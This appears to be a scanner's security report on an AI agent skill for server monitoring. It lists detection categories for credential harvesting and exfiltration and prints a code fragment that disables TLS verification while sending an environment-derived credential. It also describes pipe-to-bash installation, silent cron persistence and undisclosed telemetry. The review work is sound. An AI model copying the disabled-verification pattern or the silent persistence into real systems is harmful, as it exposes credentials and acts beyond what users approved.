AgentPulse Monitor

Security checks across malware telemetry and agentic risk

Overview

AgentPulse fits its monitoring purpose, but it has review-worthy deployment and transport-security risks before use on real servers.

Review carefully before installing. Do not use this on production or sensitive hosts until TLS verification is enabled. Avoid the pipe-to-bash installer unless you can independently inspect and verify the downloaded script. If you proceed, protect the API key config, review any cron entries before installing them, and confirm what telemetry AgentPulse stores, for how long, and who can access it.

SkillSpector

By NVIDIA

Vulnerability Patterns

Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Taint TrackingDirect Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration

Findings (11)

Tainted flow: 'req' from os.environ.get (line 163, credential/environment) → urllib.request.urlopen (network output)

Critical

Category: Data Flow
Content: ctx.verify_mode = ssl.CERT_NONE try: with urllib.request.urlopen(req, context=ctx, timeout=30) as resp: return resp.status == 200 except urllib.error.HTTPError as e: print(f"API error: {e.code} {e.reason}", file=sys.stderr)
Confidence: 99% confidence
Finding: with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:

Lp3

Medium

Category: MCP Least Privilege
Confidence: 83% confidence
Finding: The skill documents behavior that uses network access, shell execution, file reads, and likely environment/config handling, but it does not declare permissions accordingly. This reduces transparency and prevents users or policy engines from accurately assessing the trust boundary before installation.

Tp4

High

Category: MCP Tool Poisoning
Confidence: 94% confidence
Finding: The documented behavior goes beyond simple monitoring by installing persistent cron execution, collecting potentially sensitive network state such as listening ports, and the finding indicates TLS verification may be disabled when sending reports. Persistence plus infrastructure telemetry and weakened transport security materially increase risk, especially on production servers.

Description-Behavior Mismatch

Medium

Confidence: 89% confidence
Finding: The file installs recurring cron jobs, creating persistence on the host beyond one-shot monitoring. In an agent skill context, persistence mechanisms are more sensitive because they change host execution state and can continue running without further user interaction.

Context-Inappropriate Capability

High

Confidence: 100% confidence
Finding: TLS certificate verification is explicitly disabled, which defeats HTTPS authenticity and confidentiality guarantees. Any machine-in-the-middle attacker can impersonate the API server, capture credentials, and tamper with telemetry or responses, making this especially dangerous for an infrastructure-monitoring agent.

Missing User Warnings

Medium

Confidence: 97% confidence
Finding: Piping a remote script directly into bash for system-level installation is dangerous because users cannot inspect what will run, and any compromise of the remote host or delivery path can lead to immediate code execution. In the context of a monitoring agent intended for servers, this can yield full host compromise and persistence.

Missing User Warnings

Medium

Confidence: 90% confidence
Finding: The skill advertises broad metrics collection, history storage, alerting, and remediation through a cloud API without clearly warning users what infrastructure data leaves the host. For production systems, telemetry such as hostnames, process/service state, port exposure, and usage patterns can be sensitive and useful to attackers if mishandled.

Natural-Language Policy Violations

Medium

Confidence: 80% confidence
Finding: The manifest explicitly advertises "auto-remediation" without documenting any user approval, safeguards, or opt-in boundaries. In an infrastructure monitoring skill, automatic remediation can trigger service changes, restarts, configuration edits, or other operational actions, creating meaningful risk if users invoke it expecting passive monitoring only.

Missing User Warnings

Medium

Confidence: 84% confidence
Finding: The full report collects and transmits detailed host telemetry, including process counts, listening ports, uptime, service state, and system resource data, without any user-facing disclosure at runtime. In infrastructure environments, this metadata can materially aid host profiling and attack planning if exposed or sent to an unexpected endpoint.

Missing User Warnings

Medium

Confidence: 87% confidence
Finding: The `--install` path modifies the user's crontab immediately and silently, without an interactive prompt or explicit acknowledgement of the resulting persistence. In agent software, silent scheduling changes increase operational risk and can surprise users or administrators.

External Script Fetching

High

Category: Supply Chain
Content: ### 1. Register Your Server ```bash curl -X POST https://api.agentpulse.io/v1/servers \ -H "Content-Type: application/json" \ -d '{"hostname": "my-server", "plan": "starter"}' ```
Confidence: 95% confidence
Finding: curl -X POST https://api.agentpulse.io/v1/servers \ -H "Content-Type: application/json" \ -d '{"hostname": "my-server", "plan": "starter"}' ``` Save the returned `server_id` and `api_key`. ### 2

VirusTotal

63/63 vendors flagged this skill as clean.

View on VirusTotal